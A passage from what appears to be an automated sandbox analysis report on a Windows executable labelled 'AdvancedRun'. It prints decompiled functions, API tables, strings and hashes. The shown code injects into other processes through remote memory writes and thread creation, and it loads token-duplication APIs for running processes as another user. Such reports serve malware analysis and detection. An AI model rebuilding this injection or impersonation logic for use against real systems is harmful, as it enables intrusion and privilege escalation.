				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

0x0040a474
0x0040a47b
0x0040a48a
0x0040a48d
0x0040a48f
0x0040a497
0x0040a49a
0x0040a6f7
0x0040a6f9
0x0040a700
0x0040a700
0x0040a4ad
0x0040a4b3
0x0040a4b8
0x0040a4c6
0x0040a4cc
0x0040a4cf
0x0040a4dd
0x0040a4e2
0x0040a4e3
0x0040a4ea
0x0040a4e5
0x0040a4e5
0x0040a4e5
0x0040a4ec
0x0040a4f6
0x0040a4fe
0x0040a503
0x0040a504
0x0040a50b
0x0040a506
0x0040a506
0x0040a506
0x0040a50d
0x0040a512
0x0040a518
0x0040a51c
0x0040a523
0x0040a523
0x0040a523
0x0040a528
0x0040a537
0x0040a54c
0x0040a539
0x0040a544
0x0040a549
0x0040a558
0x0040a56d
0x0040a55a
0x0040a565
0x0040a56a
0x0040a579
0x0040a591
0x0040a57b
0x0040a589
0x0040a58e
0x0040a5b4
0x0040a5b7
0x0040a5cc
0x0040a5cf
0x0040a5d4
0x0040a5d7
0x0040a6ed
0x0040a5e5
0x0040a5fa
0x0040a60b
0x0040a61a
0x0040a620
0x0040a623
0x0040a62b
0x0040a62f
0x0040a632
0x0040a659
0x0040a634
0x0040a635
0x0040a641
0x0040a648
0x0040a648
0x0040a668
0x0040a66e
0x0040a685
0x0040a69e
0x0040a6a8
0x0040a6ad
0x0040a6bd
0x0040a6c5
0x0040a6c8
0x0040a6d0
0x0040a6d1
0x0040a6d2
0x0040a6d3
0x0040a6d3
0x0040a6c8
0x0040a6d7
0x0040a6dc
0x0040a6dc
0x0040a6d7
0x00000000

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

CreateProcessW, xrefs: 0040A4DD
GetLastError, xrefs: 0040A4FE
D, xrefs: 0040A528
kernel32.dll, xrefs: 0040A4BB

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

DuplicateTokenEx, xrefs: 004028DB
advapi32.dll, xrefs: 004028A6
CreateProcessWithLogonW, xrefs: 004028B7
CreateProcessWithTokenW, xrefs: 004028C2
OpenProcessToken, xrefs: 004028CF

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

0x0040a27d
0x0040a286
0x0040a290
0x0040a29d
0x00000000
0x0040a32f
0x0040a29f
0x0040a2a4
0x0040a2ad
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2c4
0x0040a2c8
0x0040a2ce
0x0040a2e3
0x0040a2ed
0x0040a2fb
0x0040a2fe
0x0040a305
0x0040a30c
0x0040a30f
0x0040a313
0x00000000
0x0040a31a
0x0040a338

APIs

GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x00401093
0x00401096
0x00401097
0x0040109b
0x004010a3
0x004010a5
0x00401270
0x00401278
0x004012b3
0x0040127a
0x00401293
0x004012a2
0x004012a2
0x004012c1
0x004012d9
0x004012ea
0x004012ec
0x004012f6
0x00000000
0x004010ab
0x004010ab
0x004010ac
0x00401231
0x00401236
0x00401239
0x0040123d
0x00401249
0x00401249
0x0040124c
0x00000000
0x00401252
0x00401259
0x00401265
0x00000000
0x00401265
0x0040123f
0x0040123f
0x00401243
0x00000000
0x00000000
0x00000000
0x00000000
0x00401243
0x004010b2
0x004010b2
0x004010b5
0x004011e1
0x004011e3
0x004011e6
0x0040120e
0x00401216
0x00000000
0x0040121c
0x00401224
0x00401226
0x00401229
0x00000000
0x0040122f
0x00000000
0x0040122f
0x00401229
0x004011e8
0x004011e8
0x004011ed
0x004011fb
0x00401203
0x00401203
0x004010bb
0x004010bb
0x004010c0
0x00401151
0x0040115a
0x00401168
0x0040116b
0x0040116e
0x00401170
0x00401173
0x00401180
0x00401182
0x00401185
0x004011a4
0x004011ac
0x00000000
0x004011b2
0x004011ba
0x004011bc
0x004011c7
0x004011c9
0x004011cb
0x00000000
0x004011d1
0x00000000
0x004011d1
0x004011cb
0x00401187
0x00401187
0x00401199
0x00000000
0x00401199
0x004010c6
0x004010c8
0x004012fd
0x004012fd
0x004012fd
0x004010ce
0x004010ce
0x004010d7
0x004010e5
0x004010e8
0x004010eb
0x004010ed
0x004010f0
0x00401102
0x0040111d
0x00401125
0x00000000
0x0040112b
0x00401133
0x00401135
0x00401140
0x00401142
0x00401144
0x00000000
0x0040114a
0x0040114a
0x00000000
0x0040114a
0x00401144
0x00401104
0x0040110a
0x0040110b
0x0040110b
0x0040110e
0x00401115
0x00401117
0x00401117
0x00401102
0x004010c8
0x004010c0
0x004010b5
0x004010ac
0x00401303

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x00408ae3
0x00408aeb
0x00408af3
0x00408b76
0x00408b8a
0x00408b91
0x00408b98
0x00408bb1
0x00408bb3
0x00408bc6
0x00408bcc
0x00408bda
0x00408be0
0x00408bf3
0x00408bfa
0x00408c0b
0x00408c12
0x00408c17
0x00408c1a
0x00408c2c
0x00408c39
0x00408c3d
0x00408c3f
0x00408c41
0x00408c52
0x00408c58
0x00408c58
0x00408c6f
0x00408c71
0x00408c73
0x00408c83
0x00408c89
0x00408c89
0x00408c8a
0x00408c8f
0x00408c91
0x00408c9a
0x00408c93
0x00408c93
0x00408c93
0x00408c9f
0x00408ca5
0x00408caf
0x00408cbc
0x00408cc2
0x00408cc7
0x00408ccd
0x00408cd0
0x00408cd6
0x00408cd7
0x00408cd8
0x00408cde
0x00408ce3
0x00408ceb
0x00408cfe
0x00408d03
0x00408d06
0x00408d0c
0x00408d21
0x00408d27
0x00408d0c
0x00000000
0x00408ca7
0x00408ca7
0x00408cad
0x00408d28
0x00408d2e
0x00408d35
0x00408d36
0x00408d42
0x00408d48
0x00408d4e
0x00408d54
0x00408d5a
0x00408d60
0x00408d66
0x00408d6c
0x00408d72
0x00408d73
0x00408d7f
0x00408d85
0x00408d8a
0x00408d8f
0x00408d90
0x00408da8
0x00408db9
0x00408dbf
0x00408dc5
0x00408dc5
0x00000000
0x00408cad
0x00408ca5
0x00408af6
0x00408afc
0x00408b07
0x00408b2a
0x00408b38
0x00408b53
0x00408b56
0x00408b62
0x00408b6a
0x00408b6a
0x00408b2a
0x00408b07
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

{Unknown}, xrefs: 00408BA5
Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
